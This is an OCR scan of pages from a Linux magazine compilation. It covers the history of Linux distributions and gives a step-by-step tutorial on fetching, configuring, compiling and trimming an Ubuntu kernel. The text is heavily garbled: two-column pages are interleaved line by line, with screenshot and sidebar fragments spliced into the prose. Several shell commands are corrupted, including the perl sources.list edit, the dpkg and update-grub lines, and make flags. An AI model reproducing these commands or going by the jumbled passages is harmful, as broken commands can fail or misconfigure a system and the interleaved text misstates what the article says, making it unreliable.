In those early days of distro evolution, things The effect is a Linux family tree (see page 43), where
changed rapidly. Development was quickly adding base you can date all distros back to an initial root release.
functionality, and people were trying out the best ways Some branches sprout and die: either the group
to package a Linux-based OS. MCC Interim Linux was maintaining it disbands or there's no wider interest.
released in February 1992 with an improved text-based Some branches become so popular they create a whole
installer, and was made available through an FTP server. new genus, becoming the basis for a further expansion.
X Windows - the standard Unix windowing system -
was ported, and TAMU Linux was released in May 1992 Evolution, not revolution
with it packaged: making it the first graphical distro. As with plants and animals, offshoots inherit traits,
While all of these are notable as being among the the base install, package manager, and software
first Linux distros, they didn’t last. The same can be said repositories being key. A package manager is how
for Softlanding Linux System (SLS), also released in the OS installs, updates, removes and maintains the
May 1992, which packaged X Windows and a TCP/IP installed software, which includes downloading software
network stack. It’s notable, though, because of its packages from the managed software servers, called
shortcomings (bugs and a change to the executable repositories. This can become contentious - these child
system) inspired the creation of the two longest-running distros are leeching off the parent’s bandwidth - but
and, in many ways, most influential Linux distros: initially, while they’re growing, this use won’t look much
Slackware and Debian. different from normal user activity.
Nowadays, a number of base distros appear, reliably Bear in mind we’re back in 1992. You’re lucky if

21 JULY 2011 18 MARCH 2012 12 APRIL 2015 MARCH 2019 2021...

■Will
v3.0 20 years young
t
v3.3 EFI Boot support v4.0 Hurr Durr v5.0 Shy Crocodile
v6+ The future...

This version bump An EFI boot stub enables an Who knows what the next 30
I’ma Sheep released Major additions include
isn’t about major x86 bzlmage to be loaded WireGuard. USB 4,2038 fix. years has in store for Tux.
Linus Torvalds decides to
technological changes, but and executed directly by Watch this space - and
poll the decision to Spectre fixes, RISC-V
keep reading
instead marks EFI firmware. increment the next release support, exFAT,
Linux Format!
the kernel’s to 4.x. It also approved the AMDGPU and so
20th anniversary. I name. much more!

Microsoft Linux

September 2010 2015


LibreOffice Microsoft Loves Linux

The Hacker's Manual | 27


Distros

there's a 14.4Kb/s dial-up modem at home: expensive many other distros have taken on modern
T1 lines (1.54Mb/s) are limited to academic institutions enhancements, Volkerding sticks to older more
and larger businesses. The early TAMU vl.O distro traditional “Unix" ways of controlling services on
required 18 disks for the 26MB binaries, and 35 disks for Slackware. There's no formal bug tracking, no official
the 50MB compressed (200MB uncompressed) source way to contribute to the project, and no public code
code. This obviously limited access in these early days repository. This all makes Slackware very much an
to academics and those in suitable businesses, so distro oddity that stands on its own in the Linux world. Due
evolution was slow. to its longevity, however, Slackware has attracted a
couple of dozen offshoots, and at least half are still
Meet the ancestors maintained today.
Softlanding Linux System was popular, but it was buggy In August 1993, Ian Murdock, also frustrated by
and badly maintained, so in July 1993, Patrick Volkerding Softlanding Linux System, established Debian, a
forked SLS and created Slackware - so named because combination of "Debby," his girlfriend’s name at the
it wasn’t a serious undertaking at the time, and was a time, and "Ian." From the outset, it was established as
reference to the Church of the SubGenius. This is the a formal, collaborative open project in the spirit of
oldest Linux distro still maintained, and it’s about to see Linux and GNU.
> Thankfully,
its version 15 release after 28 years. Slackware is Early on in the Debian project. Bruce Perens
by being buggy
SoftLandingLinux interesting because it’s very much controlled and maintained the base system. He went on to draft a
kickstarted some maintained by Volkerding, while followed by a small but social contract for the project and created Software in
good distros! enthusiastic band of users and contributors. Whereas the Public Interest, a legal umbrella group to enable
Debian to accept contributions. At the time, Perens was
|| ISoftlanding Linux System SLS MESH SHELL (c) 1994 Softlanding Software
working at Pixar, so all Debian development builds are
k / named after Toy Story characters. The Debian logo
Perm Size File Perm Size File also has a strong similarity to the mark on Buzz
। drwxr-xr-x Z Lightyear’s chin.
drwxr-xr-x z drwxr-xr-x 2
drwxr-xr-x 2 bin/ drwxr-xr-x 2 bin/
Debian is arguably the single most influential and
drwxrwxrux Z boot/ drwxrwxrwx Z boot/ important Linux distro ever. Just the sheer number of
drwxr-xr-x IO dev/ drwxr-xr-x 10 dev/
drwxr-xr-x 4 etc/ drwxr-xr-x 4 etc/ branches of distros from it would attest to that, but
drwxr-xr-x Z home/ drwxr-xr-x Z home/
Debian is renowned for its stability, high level of testing,
CRED IT: Linuxcenter.ru

drwxr-xr-x 2 insta 11/ drwxr-xr-x 2 insta 11/


drwxrwxrux 2 interviews/ drwxrwxrwx 2 interviews/
dedication to software freedom, and being a rigorously
drwxr-xr-x 2 lib/ drwxr-xr-x Z lib/
drwxr-xr-x 24 lost*f ound/ drwxr-xr-x 24 lost*f ound/ well-run organisation. It’s testament to its creator, Ian
drwxr-xr-x 2 mnt/ drwxr-xr-x 2 mnt/
dr-xr-xr-x 0 proc/ dr-xr-xr-x 0 proc/ Murdock, who sadly passed away in December 2015.
drwxrwxrux Z root/ drwxrwxrwx Z root/
drwxr-xr-x 6 sb in/ drwxr-xr-x 6 sb in/
Things were still moving slowly into 1994 - there was
just a single Slackware fork called SUSE and a few
BO Files (?61K) 30 Files (?64K)
I pBF • lesHBD i rs| nm TETTTn tht |Gz i pHHExi t| random Linux sprouts appeared, but all died out. Then

The RASPBERRY Pi
The Raspberry Pi was released in 2012. only ever expected to have been produced in BBCs, Spectrums and Commodore 64s are
Inspired in part by the success of the BBC the thousands. Of course when it was reliving and reviving the thrills at the interface
Micro (hence the monogram launched, Linux was the de facto OS of choice. of coding and creativity. The Raspberry Pi's
model names) in the early 1980s. the While many of these devices are now GPIO pins mean that all manner of add-ons
Raspberry Pi aimed to bring practical empowering young coders, a great deal have have been developed, so that the pint-sized
computer science to the classrooms and become part of diverse man-cave projects: computer can power anything from robots to
bootstrap the UK electronics industry. It was The 30-somethings who cut their teeth on remote watering systems.
The lingua franca of Pi projects is Python
which, like Basic, is easy to learn. Unlike Basic,
though, it's consistent, extensible and won't
eed to be unlearned should users
move on to more advanced languages.
The Pi's support for 3D graphics is
impressive, but CPU-wise it’s more limited.
The orig nal Pis struggle to function as a
desktop computer, even with the modest
Raspbian distribution (although recent work
on the Epiphany web browser has improved
this).
In 2015 the Pi received the Pi 2 reboot,
gaining a quad-core processor and extra RAM,
and yet still only cost £25. Jump forward six
years and we have the Pi 4 in its various forms
including a full-desktop capable 8GB version
the Pi 400. a range of industry-friendly models
and over 30 million sales. Splendid.

28 | The Hacker's Manual


30 years of Linux

in October 1994, Red Hat Linux was publicly released. Meanwhile in Germany. SUSE (Software > Debian is
Red Hat was established as a for-profit Linux business, und System Entwicklung) started life as a commercially the distro that
launched
initially selling the Red Hat Linux distribution and going sold German translation of Slackware in late 1992. In
more distros
on to provide support services. Red Hat went public in 1996, an entire new SUSE distro and business was
than any other!
1999. achieving the eighth biggest first-day gain in the launched, based on the Dutch Jurix Linux, selling the
history of Wall Street. It entered the NASDAQ-100 in new distro and support services.
December 2005 and topped $1 billion annual revenue in SUSE was purchased by Novell in 2003, and in 2005,
2012. IBM purchased Red Hat in October 2018 - 24 the openSUSE community edition was launched, while
years after its first release - for $34 billion. So that SUSE Linux Enterprise was developed in tandem for its
worked out very well. commercial arm. SUSE was acquired in 2018 for $2.5
billion and returned double-digit growth through 2020,
A tale of hats and forks with a revenue of over $450 million. Yet despite its
Red Hat Linux was relaunched as Red Hat Enterprise in 2001, success, SUSE and openSUSE have only ever attracted
and its commercial success attracted a wide range of forks. a couple of forks. We could be wrong when we say this is
Notably, Red Hat directly supports Fedora as its testing distro possibly down to their European roots.
and CentOS as its free community edition. Or it did. CentOS
is being shuttered - to understandable community disdain - It’s a distro inferno
and a rolling release, CentOS Stream, is replacing it. As an Between the creation of Red Hat in 1994 and 2000,
alternative, Red Hat Enterprise is now offered freely to there were a number of Red Hat spin-offs, because at
community projects with fewer than 16 servers. that point there was clear commercial interest in Linux.
Throughout this period, Linux was best suited to
business server tasks, where much of the open-source
Unix work had been focused. However, by the end of the
1990s, 56k modems had become commonplace, early
home broadband was just appearing, and modern
graphical desktops were in development. Linux was
about to get a whole new audience.

“Debian is renowned for its


stability, high level of testing,
dedication to software freedom,
and being a rigorously well-run
organisation.”
>The late Ian Murdock founded the influential Linux distribution
Debian in 1993. Linux Format spent time talking with him in 2007.

CREDIT: Based on the LinuxTimeLine, by fabiololix, GNU Free Documentation License vl.3, https://github.com/FabioLolix/LinuxTimeline/tree/master

The Hacker's Manual | 29


Distros

One early example was Mandrake Linux, in mid-1998. A hard to measure - when users are polled. Why Ubuntu
fork of Red Hat, it was crazily aimed at making Linux became so popular is hard to fully pinpoint. Key is just
easy to use for new users, using the new Kool Desktop like Mandrake before it, Ubuntu set out to make desktop
Environment (KDE). The French/Brazilian development Linux easy for first-time users. It also offered the distro
team gained a lot of attention but, ultimately, financial on free CDs via its Shiplt service until 2011, alongside
problems closed the project in 2011. However, its spirit fast, reliable server downloads. Furthermore, it was
continues in the excellent but less well-known Mageia based on the popular Debian, it jumped on the new,
and OpenMandriva projects. slick Gnome desktop, and it set out a regular six-month
release cycle, with a Long Term Support release every
A distro with humanity in mind two years. Support was for 18 months (now nine
With Mandrake pointing the way, the early 2000s saw an months) for regular releases, and 36 months for LTS
explosion of distro releases. Now that the Debian project at ones (now five years).
this point was well established, well regarded and well known, Ubuntu also offered great forums and help sites,
it became the basis for hundreds of Linux distros. But we'll along with a community council, and support for forks
only mention one: Ubuntu, released in 2004 by South African such as Xubuntu, Lubuntu and many others. It had sane
millionaire Mark Shuttleworth, who jokingly calls himself the defaults, too, and made it easier to install display drivers
self-appointed benevolent dictator for life. The Ubuntu (an absolute pain 10-plus years ago), while offering a
Foundation was created in 2005 as a philanthropic project - huge catalogue of tested, ready-to-run open-source
Ubuntu is a Zulu word meaning humanity - to provide quality software and dedicated server builds. We guess when
open-source software, with Canonical as the supporting you say all this out loud, it sounds pretty compelling!
commercial arm. Two core release branches we'll quickly mention are
Ubuntu as a branch of Debian has itself seen over 80 Arch Linux and Gentoo, both released around 2000.
distros fork from it. while Ubuntu has the highest share Gentoo (named after the fastest penguin in the world) is
of all desktop Linux installs - though this is notoriously a built-from-source distro compiled with specific
optimisations for the hardware it's going to run on. This
is very clever, but also very time-consuming. Google
Chrome OS is derived from Gentoo. In early 2002, Arch
Linux was released, devised as a minimalist distro,
where the user does much of the installation work to
create an OS with just the parts required. This DIY
approach was partly why Arch is renowned for its
amazing documentation and for rolling out the earliest
> With big bucks, release of new versions of software.
comes big offices! At the height of the distro madness (around 2010),
Here’s the Red there were almost 300 Linux distros, we'd argue an
Hat HQ sporting unsustainable number, with many just repeating basic
its old logo.
desktop functionality already available in core root
CREDIT: Bz3rk, CC BY-SA 3.0 https://en.wikipedia.Org/wiki/Red_Hat#/media/File:Red_Hat. distros. Progressing into the 2000s. and with increasing
headquarters_at_Raleigh._North_Carolina._US_-_9_November_2013.jpg

Get your Linux game on


There's always been a niche interest in gaming Things started to changed when Valve dedicated Debian-based distro for running its
on Linux, but this was mostly done through ported its Source engine to Linux along with Steam client. This was to tie in later with its
Wine, which has been around since the mid- releasing its Steam for Linux client in 2012. failed attempt at creating a Steam Machine
905 and frankly always felt like a sticking This opened the gate for Source-based native ecosystem. Today there are over 7.000 native
plaster to enable World of Warcraft or Linux game distribution. Linux games available on Steam, out of
whatever the current Windows game of choice In addition, at the end of 2013 Valve around 14.000 in total.
was to be played on Linux. announced it was creating SteamOS a Perhaps more significantly is that Valve
never stopped developing SteamOS, despite
its Steam Machine failure. In 2018 Valve
released its own internal folk of Wine called
Proton that was integrated into Steam itself
and propelled Linux support for Windows
games to a new level, with currently a
reported 50 per cent of games offering
Platinum compatibility.
But why all this work just to help one per
cent of Steam's Linux-using gamers? This
summer Valve revealed its Steam Deck, a
Linux-powered hand-held PC console, which it
promised would run all Windows games via its
Steam Proton layer. Perhaps 2021 is year of
the Linux desktop after all...

30 | The Hacker's Manual


30 years of Linux
> Google's
Android (not a
distro) is frowned
upon in the Linux
world, but you
can't deny the
effect it had on
the market.

complexity in maintaining a
modern OS, the number of Linux distros, such as Android, Chrome OS, Intel's ClearOS,
distros started to reduce, but that didn't stop well- Google’s Wear OS, Sailfish OS, and the host of server­
organised groups creating popular new distro forks specific distros. Even today, there are well over 200
when they felt a need. active Linux distros, and they’re as diverse, interesting,
A good example is Raspberry Pi OS, a rebrand of and wonderful as the communities that use them.
Raspbian, itself a fork of Debian. The new Arm-based
hardware platform needed a dedicated operating Looking forward
system, so picking up Debian and refitting it for the But what of the future? Technology predictions are
Raspberry Pi, including educational software, libraries notoriously tricky, but why would we ever let that stop
for its GPIO access, and tailored tools to configure its us? Will Tux still be active in 30 years? We’d say that’s a
hardware, made absolute sense. safe bet; even if all development stepped now, people
Linux hardware specialist System76 was tired of would keep on using it for years if not for decades.
niggling software issues associated with using other There are retro computer systems that are still ticking
distros, and wanted direct control. So, it introduced over almost as long later, and the Linux kernel is far
PopLOS, a fork of Ubuntu, to not only directly support more functional than they ever were.
its laptops and desktop hardware, but also its A more likely scenario is Google, as an example,
customers’ needs. It's a slick, modern distro. with moving to an alternative kernel - Fuschia, say - though
support for popular software and hardware. this would likely just be for Android and its loT devices.
Linux Mint started in 2006 as a small personal Yet even if Google moved literally everything it runs to
Uburtu fork project. When Ubuntu changed to its Fuschia, the Linux kernel is used so widely elsewhere
"modern” Unity desktop design in 2011, many users that it would just keep on trucking.
revolted. The Linux Mint project created its own As we've seen, the Linux world is larger than just its
"classic" desktop, called Cinnamon, in 2012, and it kernel. An OS is a whole ecosystem of interconnected
brought many former Ubuntu users with it. The Linux systems that have to be developed, tested and
Mint project has stuck with its “user first" design packaged in an orchestrated manner. Linux was built on
approach, and evolved remarkably well. GNU tools and its licence: this widened the appeal of
This doesn’t even touch upon commercially focused Linux and enabled the kernel with suitable distros to be
deployed in such vastly differing devices, from the
fastest super computer in the world to a lowly $4 Pi.
The Linux kernel isn’t tied to the success of any one
corporation. Sure, there’s the Linux Foundation and
Torvalds himself, but succession has already been put
into place to keep kernel development going if Torvalds
should step down. And while the Linux Foundation isn’t
necessary, it's certainly handy to orchestrate and
handle funding and trademarks.
Put all of that aside, the reason Linux has succeeded
is that it’s damn good at its job and everyone can
contribute. It’s the single greatest software development
project of modern times, which doesn't mean it's
perfect - it's software after all - but it’s continually
improved and enhanced, it's strong copyleft open
source, it fostered a fabulous community and it’s given
Linux Mint became one of the most popular distros by, us all endless opportunities. So keep on enjoying it!
unbelievably, giving users what they wanted!

The Hacker's Manual | 31


Build the
The kernel is what makes Linux tick.
Jonni Bidwell is happy to get his hands
dirty and help you tune up those ticks..

.Illliill'ill
IHimUiiil

H I I I I .liii

inux, if you want to be annoyingly of the operating system, as well as some it's mere or less mandatory there. But it's

L precise about it, isn't a complete


operating system. It is but a kernel.
things you might think belong elsewhere.
This includes drivers, filesystems,
And like the kernel of a seed pod, it requires
all the surrounding bits to be useful.
network protocols, schedulers (process
and I/O), memory allocators and all kinds
an option for any flavour of Linux, so we
thought we’d have a go at making building
kernels more accessible.
As we'll discover, the Linux Kernel is
A bootloader can happily load a Linux of other treasure. huge and complicated. It may be tempting
kernel with no init system specified, and In the early days of Linux, users would for some to pore over it with a fine-toothed
it will just sit there. Without userspace regularly have to face compiling their own comb, trying to "optimise" it for speed or
applications (for example, systemd in the kernels, sometimes to get new hardware size. But this is for the most part hopeless,
first instance) telling the kernel what to support, sometimes to reconfigure their and more likely to result in breakage than
do it will simply idle. Yet it has the way out of brokenness, and sometimes to anything else. If you want a faster, more
potential to do almost anything. The improve performance. Users of Linux from responsive kernel, then a better approach
kernel includes everything you would the Scratch or Gentoo days will be familiar is to use one of the many custom efforts
think of as being a low-level component with the kernel compilation process, since that are available.

32 | The Hacker's Manual


Build the Kernel

Grasp the kernel basics


Just what is a kernel and why is it telling my computer what to do?
hen you think of an operating system (OS) it > The kernel

W ought to be an umbrella term for the 'thing'


that’s responsible for everything your
computer does after the BIOS/UEFI hands over control to
the bootloader. For popular systems such as Windows
is a modular
masterpiece
that can run
everything from
old AGP graphics
and macOS it’s easy to lump everything together thusly.
to the Large
There’s no choice of desktops, no option to boot to a
Hadron Collider.
(real) command line and no real way to replace core
applications (like Explorerand Finder). On Linux it’s clear
that things are much more modular. The progression from
UEFI to bootloader to kernel to login screen is much more
demarkated. If you’re quick you can even identify the
moment the kernel hands over to the initialisation system Since this package is required for all the drivers in the
(for example, systemd or runit). Yet it turns out that every kernel (usually packaged as linux-image-...) to work, we
operating system has a kernel. can't forget its size (lib/firmware occupies over 700MB
The falsehood that macOS is based on BSD on our system). Drivers themselves, occupy fairly
(perpetuated by lazy journos and Mac users who like to negligible space.
claim their OS is more grown up than it is) stems from the
Darwin OS upon which it’s based. Darwin is open source
and partly BSD-based, but it also borrows from other
OSes (particularly NeXTSTEP, which was bought by Apple
Mainlining
in 1997). Darwin has its own kernel called XNU (an
Over the page we'll look at compiling a trivially modified Ubuntu kernel.
acronym for X is Not Unix), which unlike Windows and
Canonical apply patches and backported fixes to their kernels, with the effect
Linux is a hybrid, as opposed to a monolithic, affair. It’s
that an Ubuntu kernel bearing the version number 5.13.0, say (which we got by
based on the Mach kernel, originally a research project
running uname -a on our Ubuntu 20.04 VM) may be constitutionally very
into microkernels, with BSD functions added (so it’s not a
different from a “mainline" Kernel 5.13 that you would download from https://
"BSD-based" kernel). The more shiny layers of macOS, kernel.org. You might want to build your own mainline kernel, for example if you
namely the Aqua GUI, the Cocoa/Carbon interfaces and suspect a bug has been fixed upstream (or indeed, if you think that an Ubuntu
various application services, are all proprietary and have patch introduced the bug). That's easy: just extract the source tree and follow
nothing to do with BSD. the instructions over the page.
What’s even easier is using the pre-packaged mainline kernels produced by
Driving the deal the Ubuntu team. First read the blurb at https:/7wiki.ubuntu.com/Kernel/
MainlineBuilds, then follow the link there to
The XNU kernel has its own driver API called lOKit, and
the Mainline Kernel Archive. You’ll see that while Ubuntu 21.10 and LTS (if it’s
Windows’ kernel has the less imaginitively titled
kitted out with the Hardware Enablement stack) are running Kernel 5.13, the
"Windows Driver Model". Drivers (programs that talk to
current in-development series (confusingly also called ’’mainline") is 5.17. We
hardware) are perhaps the easiest component of a don’t advise trying out these release-candidate (RC) kernels at first. But you
kernel to get your head around, in the sense it’s easy to may have reason to try the Longterm branch, which currently is 5.15. As of now,
see why they need to be there. The only trouble is, most this branch is used by PopLOS and it’s what the next LTS of Ubuntu will be
modern Linux distros have very few drivers baked in to based on.
their kernels. Instead, the preferred approach is to AeUrtbci Q r.rcfowcb - SFefe 1109 A < O -
include drivers compiled as external modules, which
can be loaded early on in the boot process by Udev
when the corresponding hardware is detected. Modules
plug straight into the kernel, and for the most part act
as if they were a part of it. Other kernel components can
be 'modularised' and loaded on demand too. but certain
low-level systems (for example, the one for loading
modules in the first place), have to be built in. Protocol Location
Latest Release
HTTP tMtps://www.kcrncLorg/pub/
So the Linux Kernel contains drivers for every bit of GIT https://git.kemel.org/
5.16.7 ©
hardware supported by Linux. Well, almost. Modern R5YNC rsyncZ/rsync.kerneLorg/pub/

hardware (particularly Wi-Fi and GPUs) often requires


firmware to be uploaded to it on every boot, otherwise it mainline: 5.17-rc3 2022 02 06 [tarball] (patch) (Inc. patch] (view dlff] (browse]

won’t work. This firmware is generally not included in ;xo stable: 5.16.7 2022-02-05 [tarball] (pgp) (patch] [Inc. patch] (view dlff] (browse] (changelog]
longterm1 5.15.21 2022-02-05 (tarhall) (pgpj (patch) [me patch] (view cliff] (browse] (changelog]
distribution’s kernel source packages (since it’s not
> A smorgasbord of kernels can be found at https://kernel.org, from
source code and sometimes proprietary), but rather
bleeding edge-RCs, to the SLTS 4.4 series.
shipped in a separate linux-firmware package.

The Hacker's Manual | 33


Distros

Compiling a kernel
Get straight to business and build your own Ubuntu-esque kernel

o compile your own kernel using Ubuntu $ apt source linux-image-unsigned-$(uname -r)

T (or any distro that uses Ubuntu kernels, for


example Mint, elementary OS, but not PopLOS)
the first step is to get hold of the kernel sources.
The official channel for vanilla kernel sources is
If you’re running the HWE kernel, which you probably
are if you’re running an up-to-date desktop edition of
Ubuntu 22.04, then the sources will land in the linux-
hwe-5.13-5.13.0/ directory. You'll also be told that the
https:Z'kernel.org, but this isn’t necessarily the best HWE kernel package is developed on Git, and that more
place to start. Instead, we'll use an Ubuntu kernel, which up-to-date sourcescan be acquired via:
includes numerous patches and backported features. It $ git clone git://git.launchpad.net/~ubuntu-kernel/
also has the advantage of coming with a configuration ubuntu/+source/linux/+git/focal
very close to what you're currently running (in fact it's Either way, once we have the sources we may as well
identical if you have the same version). So if we make disable the source repositories. If you used the Perl
only small changes there, then we’d hope the resulting command earlier you can do this with:
kernel still has all the functionality of the old. $ sudo mv -f /etc/apt/sources.list{.bak,}
Besides the kernel source files, we also need the Incidentally, the apt source directive will get the
required build tools. If you’ve ever compiled anything source code to absolutely any package in the Ubuntu
before you'll probably have all these. But if not, get them (or whatever apt-based distro your using). Neat. We
with the following: didn't use sudo in the apt command because sources
$ sudo apt build-dep linux linux-image-$(uname -r) are downloaded to the current directory, which we
Using uname like this ensures the build tools you're carefully made sure was the home directory. The full
about to download correspond to the kernel you’re kernel sources are large (1.2GB for Ubuntu 21.10) and
running, and that both are new. If you updated your apt will fail if there’s insufficient space. If this happens
system before this command, you might want to reboot hit Ctrl-C, delete the linux-hwe* files in your home
(in case a new kernel was available) and then fetch the directory, and try again somewhere with plenty
build tools (and kernel sources). If the command of space.
complains about not being able to find source packages,
you may need to uncomment the lines beginning Time to compile
deb-src in /etc/apt/sources.list for both the main Having successfully downloaded the sources, let's
and updates repositories. Alternatively, since we've configure and compile them. When you compile the Linux
got a bit of a Perl flavour going on this issue, this little kernel, you're free to include or exclude whatever
snippet will do it for you: components you want. Traditionally, these were selected
$ sudo perl -i.bak -pe “s/*# (deb-src .* $(lsb_release -cs) from a glorious text-based menu accessed by running
(-updates)? main restricted$)A$l/” /etc/apt/sources.list make menuconfig . Things have moved on now and
Those dependencies are plentiful (and include Java there’s a modern configuration interface. Don't get too
and LaTeX), but our story is not yet done. The (slightly excited, though - it’s still text based, but now it's powered
outdated) Ubuntu wiki at https://wiki.ubuntu.com/ by ncurses and has a hacker-style black background.
Kernel/BuildYourOwnKernel mentions that the Summon this with:
previous command doesn't install everything required. $ cd linux-hwe-5.13-5.13.0/
And that statement is still correct. The following $ make nconfig
packages should fill in any gaps, but if not you'll be told See? Glorious. Navigate through the menus using
what’s missing: the cursor keys and Enter. Options are selected or
$ sudo apt install libncurses-dev fakeroot kernel-package deselected (or selected to be built as modules) using
You may see a warning about updating kernel-img. Space, but don't change anything just yet (you can
conf, in which case you should choose to install the always quit, by pressing Escape, without saving and run
package maintainer's version. In any event, let's get hold the last command again to return). Instead, let’s have a
of those sources: look at what's in your kernel.
Everything's organised into menus, one of which
is Device Drivers which we've already talked about.
A lxf©lxf-St*nd*rd-PC-<?3S-ICH>2009: -/Unux-tkg/Unux-wx-glt Q = □ $
You'll also see sections for Memory Management,
Ixf^xf.SUndifdPGQJMCHMtXH: -/II... lxf©Uf-SUnd»rd«PC-Q35»ICH>2009: -/II... lxf©<xf-Stand»rd-?C-Q3S-ICH9-2009: -/II... v

lxf@lxf-Standard-PC-Q35-ICH9-2009:--/l git$ unane -a


Networking, Virtualisation and a few others that all
Linux lxf-Standard-PC-Q35-ICH9-2009 5.13.19+lxf #1 SMP Mon Feb 7 12:21:02 GMT 2022 x86_64 x86_ might be expected to appear in an OS. Sections that
64 X86.64 GNU/Linux
lxf@lxf-Standard-PC-Q35-ICH9-2009:~/linux-tkg/Unux-src-git$ systend-analyze house further options have —> at the end.
Startup finished in 1.768s (kernel) + 6,625s (userspace) = 8.394s
graphical.target reached after 6.603s in userspace
We’ll start by making a single, simple change. Go
lxf@lxf-Standard-PC-Q3S-ICH9-2069:~/linux-tkg/linux-src-git$ |
to the General setup category. Inside you'll see lots of
confusing options, some of which have been selected
according to Ubuntu’s default configuration. The option
> Switching from ZSTD to LZ4 compression reduced the time taken to load the to use ZSTD compression, you might recall, became the
kernel on our virtual machine, although not by anything significant. default in Ubuntu 20.04.

34 | The Hacker's Manual


Build the Kernel
[M] drtvers/net/wtrele Processes Resources File Systems > Compiling
["] drtvers/nedia/pct/
[H] drivers/nedta/pcl/ kernels will
CPU History
[M] drtvers/gpu/drn/no really put your
[MJ drtvers/nedta/pct/
[M] drtvers/gpu/drn/no CPU through its
[MJ drtvers/net/wtrele paces. Our laptop
[MJ drivers/net/wirele
[MJ drtvers/net/wtrele MMCOAdl SO got too hot to
[Hj drtvers/gpu/drn/no CPU1 100.0% Hi CPU2 100.0% CPU3 100.0% type on (now
[MJ drivers/nedta/pct/
[MJ drtvers/gpu/drn/no Memory and Swap History there’s an excuse
[M] drtvers/net/wtrele
for late copy! -
[M] drtvers/net/wtrele
[M] drtvers/nedta/pct,' Ed).
[MJ drtvers/gpu/drn/nv
[M] drtvers/net/wtrele
[MJ drtvers/gpu/drn/no
Memory Swap
[M] drtvers/nedta/pct/ * 1.6GiB (41.5%) Of 3.8 GiB
drtvers/nedta/pct/ 304.9 MiB (14.9%) of 2.0 GiB
Cache 2.1 GiB
drtvers/nedta/usb/
[MJ drtvers/nedta/usb/ Network History
[M] drtvers/net/wtrele
[M] drtvers/gpu/drn/no
[M] drtvers/net/wtrele $12byt«Vi
[M] drtvers/nedta/usb/
QSjtesA
[M] drtvers/gpu/drn/no 20

Receiving 0 bytes/s Sending 0 bytes/s


Total Received 576.0 MiB Total Sent 4.1 MiB

We can find out more about a particular option by Note this is documented precisely nowhere. Finally
highlighting it and pressing F2. Doing this in the kernel let’s build the thing:
compression mode option tells us something about $ fakeroot make-kpkg -j “$(nproc)” —initrd -append-to-
which compression options work best on what system, version-’+lxf” kernel-image kernel-headers
as well as a considered note about who to contact Now make a cup of tea because the stock Ubuntu
if certain options don’t work. Let’s switch to LZ4 kernel is rather fully featured. You’ll see files being listed as
compression and see if we can spot a difference. they’re being compiled, linked and generated. It’s
reasonably pleasing to watch, but you may need another
See what’s on the SLAB cup of tea. On our XPS13 it took most of a lunch hour
If you like odd-sounding acronyms, have a look in the (Who said you were allowed an hour for lunch!? - Ed) to
Choose SLAB allocator menu (towards the bottom of the finish up, over the course of which it got rather hot. Even
General setup menu). Before you get dragged in Covid-free draughty corridors of Future Towers.
deep into the rabbit’s warren of kernel options, exit by All going well you should see twc .deb packages in
pressing F9 and make sure you save the configuration. your home directory (not the source directory): one
You’ll be told it’s stored in a file named .config. containing the kernel image, and one containing the
One slight quirk with using the Ubuntu kernel is that headers. We’ve been careful to only do a very trivial
it’s configured by default to use Canonical’s Trusted modification (so, only changing the compression
System Keys. Because these aren’t included in the format) for our first outing. And with good reason.
kernel sources, the build will fail without some These packages are going to replace the current kernel
intervention. We can either manually disable the keys packages on the system. This shouldn't really be a
(they’re deep in the Cryptographic Services menu), problem since Ubuntu always has a fallback kernel on
or we can use the helpful Debian scripts: hand, but we don’t really want our first effort to result
$ scripts/config -set-str SYSTEM_REVOCATION_KEYS in a kernel panic. See how you fare with:
$ scripts/config -set-str SYSTEM_TRUSTED_KEYS $ sudo dpkg -i linux-‘.deb
This sets these to blank strings. The config program The kernel should be installed as Grub’s new default.
also has a -disable argument, but if you use that here Check after a reboot with the uname-a command, and
it breaks because a string value is required here. if necessary hold down Shift to bring up a boot menu.

Colonel Kurtz advises...


Using the Ubuntu (technically Debian) tools to build kernels is all well Did we say finally? Not quite - we still need to run sudo depmod to
and good. But if you’re just hacking away on a kernel for personal enumerate our modules, and then (finally) update grub with sudo
usage, you might not want to go to the bother of packaging it all. And update-gmb.
it’s certainly inconvenient to do as we’ve done and replace the current
> If you like
kernel packages with custom ones, since those packages will be
endless options,
overwritten as soon as Ubuntu release a new kernel.
settings and
It's not recommended to try and build these packages with different
frobs all arranged
names, and it's likely to break things if you try to use any other kind of
in an Ncurses
workaround here. Instead, you can build kernels using the mainline
interface then
tools and not worry about packaging them. You can run make nconfig
you'll love this.
from the sources directory to use the (modern) ncurses configurator.
Then once you’ve saved it run make to build it and sudo make
modulesjnstall to install the modules. Finally, you’ll want to copy the
kernel image to /boot with sudo make install.

The Hacker’s Manual | 35


Distros

Kernel minification
Perfection is reached not when there’s nothing left to add,
but rather when there’s nothing left to take away...
y this point the chances are you’ve already had a Another reason for removing things is demonstrated

B look around the config menu and have noticed


there's an awful lot of stuff in there you don’t
need. This is probably true, and a lot of people are
interested in making the kernel smaller.
by the Linux-libre kernel. Here, drivers that require
proprietary firmware or microcode have all been
removed. As has firmware and microcode itself, which
if you take a look at your /lib/firmware directory (ours
People building for embedded systems, where storage was over 700MB) adds up to a substantial saving. Of
space and memory are scarce, naturally will want to pull as course, removing firmware files should be done carefully,
much stuff as possible out of the kernel. We’ve mentioned since any device depending on them will cease to
that there isn't really a performance or memory hit from function. There’s also the annoyance of carefully
having so many unused drivers compiled as modules. removing unneeded files, only for a new linux-firmware
However, there is a disk space hit, although perhaps not as package to appear and not only replace them, but add
large as you might think (see box, below). yet more unnecessary cruft.

> At first glance,


m lx20lxf-Stxnd«rd-PC-Q3S-ICH3-2OO9: -/llnux^kg/lkiux-wc^K Spotting superfluous fireware
there’s a lot of
lxT0lxr.SUnd.rd.A<^SS-ICH».2OO9: -/I... Ur0<xr.SUnd«rd-PC^3S-ICH»-2OO9: -/I... Ixr^lxf-SUnd.rd Depending on your hardware it might be easy to see
superfluous
which firmware files you need, or at least which ones
drivers in the • config. - LinuxZx86_JxlS.1 Kernel Configuration
kernel. But ।— SCSI device support-------------------------------------------------------------------------------- you don’t need. For example, if you don’t have an
you never know {M) RAID Transport Class
AMD graphics card then you can remove the 56MB of
SCSI device support firmware in /firmware/amdgpu. or indeed the 7MB of
when you’ll need
[*] legacy /proc/scsi/ support
tape access... ^^***SCSIsupporttype(disl<itape;CO^ROM)***^ bits in /firmware/radeon for older cards. There’s a small
SCSI tape support
volume of firmware for the Nouveau driver, the open
<M> SCSI CDROM support
source offering for Nvidia cards, but it’s not really worth
<M> SCSI generic support
[*] /dev/bsg support (SG v4) worrying about at this stage.
<M> SCSI media changer support
